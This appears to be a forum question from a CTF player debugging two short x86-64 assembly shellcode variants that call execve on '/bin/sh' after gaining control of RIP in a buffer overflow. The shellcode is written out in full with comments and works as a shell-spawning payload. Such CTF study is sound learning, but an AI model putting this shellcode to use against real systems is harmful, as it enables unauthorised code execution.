Shell execution buffer overflow server directly hosted


I usually use a different method to push /bin/sh in rdi to get a shell, but I wanted to try this one. Suppose that I can control the RIP and there are no limitations or filters, so I can execute the assembly code as I want.

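mov rax, 0x0068732f6e69622f   /* "/bin/sh\0" as a little-endian qword */
push rax                      /* string now sits at the top of the stack */
push rsp                      /* push the address of the string */
pop rdi                       /* rdi = pointer to "/bin/sh" */
mov rax, 0x3b                 /* syscall number 59 = execve */
xor rsi, rsi                  /* argv = NULL */
xor rdx, rdx                  /* envp = NULL */
syscall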

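lea rdi, [rip + shell]        /* rdi = RIP-relative address of the string below */
mov rax, 0x3b                 /* syscall number 59 = execve */
xor rsi, rsi                  /* argv = NULL */
xor rdx, rdx                  /* envp = NULL */
syscall

shell:
  .string "/bin/sh"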

While I usually use the above one, I don't get why the first one isn't working. I also used GDB to verify, and everything seems to be good and in the right positions. In addition to that, I also get in gdb: process 8870 is executing new program: /usr/bin/dash.

Why doesn't it work?

So that's what I tried to do, but I don't get why it doesn't work. Actually, in the current CTF neither of them works, even if, as I said, in gdb everything seems right.
